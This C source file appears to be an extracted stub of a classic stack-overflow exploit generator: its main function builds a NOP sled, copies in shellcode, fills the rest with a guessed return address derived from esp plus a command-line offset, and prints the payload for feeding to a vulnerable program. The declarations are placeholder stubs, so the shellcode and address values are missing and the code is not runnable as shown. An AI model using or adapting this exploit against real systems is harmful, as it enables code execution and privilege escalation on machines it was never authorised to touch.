
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int SIZE ;
 char* buffer ;
 int esp ;
 int fprintf (int ,char*,int) ;
 int memcpy (char*,int ,int) ;
 int memset (char*,int ,int) ;
 int nop ;
 int offset ;
 int printf (char*,char*) ;
 int shell ;
 int stderr ;
 int strlen (int ) ;
 scalar_t__ strtol (char*,int *,int ) ;
 scalar_t__ strtoul (char*,int *,int ) ;
 int x86_nop ;

int main (int argc, char *argv[]) {
    int i;

    if (argc > 1) offset += strtol(argv[1], ((void*)0), 0);
    if (argc > 2) nop += strtoul(argv[2], ((void*)0), 0);

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));
    for (i = nop+strlen(shell); i < SIZE-4; i += 4) {
        *((int *) &buffer[i]) = esp+offset;
    }

    fprintf(stderr,"0x%x\n",esp+offset);
    printf("%s", buffer);

    return 0;
}
